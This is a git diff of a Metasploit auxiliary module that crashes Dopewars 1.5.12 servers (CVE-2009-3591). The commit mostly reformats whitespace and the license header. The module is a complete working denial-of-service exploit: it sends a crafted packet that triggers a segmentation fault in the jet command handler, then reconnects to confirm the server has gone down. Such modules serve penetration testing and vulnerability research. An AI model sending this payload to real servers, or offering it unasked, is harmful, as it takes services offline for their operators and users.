|
1 |
| -# Dopewars DOS attack |
2 |
| -# |
3 |
| -# The jet command in Dopewars <= 1.5.12 is vulnerable to a segmentaion |
4 |
| -# fault due to a lack of input validation. |
5 |
| -# |
| 1 | +## |
| 2 | +# This file is part of the Metasploit Framework and may be subject to |
| 3 | +# redistribution and commercial restrictions. Please see the Metasploit |
| 4 | +# web site for more information on licensing and terms of use. |
| 5 | +# http://metasploit.com/ |
| 6 | +## |
6 | 7 |
|
7 | 8 | require 'msf/core'
|
8 | 9 |
|
9 | 10 | class Metasploit4 < Msf::Auxiliary
|
10 | 11 |
|
11 | 12 | include Msf::Exploit::Remote::Tcp
|
12 | 13 | include Msf::Auxiliary::Dos
|
13 |
| - |
| 14 | + |
14 | 15 | def initialize(info = {})
|
15 |
| - super(update_info(info, |
16 |
| - 'Name' => 'Dopewars Denial of Service', |
17 |
| - 'Description' => %q{ |
18 |
| - The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. |
| 16 | + super(update_info(info, |
| 17 | + 'Name' => 'Dopewars Denial of Service', |
| 18 | + 'Description' => %q{ |
| 19 | + The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. |
19 | 20 | },
|
20 |
| - 'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ], |
21 |
| - 'License' => MSF_LICENSE, |
22 |
| - 'Version' => '0.0.2', |
23 |
| - 'References' => |
| 21 | + 'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ], |
| 22 | + 'License' => MSF_LICENSE, |
| 23 | + 'Version' => '0.0.2', |
| 24 | + 'References' => |
24 | 25 | [
|
25 | 26 | [ 'BID', '36606' ],
|
26 |
| - [ 'CVE', 'CVE-2009-3591' ], |
| 27 | + [ 'CVE', '2009-3591' ], |
27 | 28 | ]))
|
28 |
| - |
| 29 | + |
29 | 30 | register_options([Opt::RPORT(7902),], self.class)
|
30 | 31 | end
|
31 | 32 |
|
32 | 33 | def run
|
33 |
| - # The jet command is vulnerable. |
34 |
| - # Program received signal SIGSEGV, Segmentation fault. |
35 |
| - # [Switching to Thread 0xb74916c0 (LWP 30638)] |
36 |
| - # 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at |
37 |
| - # serverside.c:525 |
38 |
| - # 525 dopelog(4, LF_SERVER, "%s jets to %s", |
39 |
| - # |
40 |
| - connect |
| 34 | + # The jet command is vulnerable. |
| 35 | + # Program received signal SIGSEGV, Segmentation fault. |
| 36 | + # [Switching to Thread 0xb74916c0 (LWP 30638)] |
| 37 | + # 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at |
| 38 | + # serverside.c:525 |
| 39 | + # 525 dopelog(4, LF_SERVER, "%s jets to %s", |
| 40 | + # |
| 41 | + connect |
41 | 42 | pkt = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"
|
42 | 43 | print_status("Sending dos packet...")
|
43 | 44 | sock.put(pkt)
|
44 | 45 | disconnect
|
45 | 46 |
|
46 |
| - print_status("Checking for success...") |
47 |
| - sleep 2 |
48 |
| - begin |
49 |
| - connect |
50 |
| - rescue ::Interrupt |
51 |
| - raise $! |
52 |
| - rescue ::Rex::ConnectionRefused |
53 |
| - print_good("Dopewars server succesfully shut down!") |
54 |
| - else |
55 |
| - print_error("DOS attack unsuccessful") |
56 |
| - ensure |
57 |
| - disconnect |
58 |
| - end |
| 47 | + print_status("Checking for success...") |
| 48 | + sleep 2 |
| 49 | + begin |
| 50 | + connect |
| 51 | + rescue ::Interrupt |
| 52 | + raise $! |
| 53 | + rescue ::Rex::ConnectionRefused |
| 54 | + print_good("Dopewars server succesfully shut down!") |
| 55 | + else |
| 56 | + print_error("DOS attack unsuccessful") |
| 57 | + ensure |
| 58 | + disconnect |
| 59 | + end |
59 | 60 | end
|
60 | 61 | end
|
0 commit comments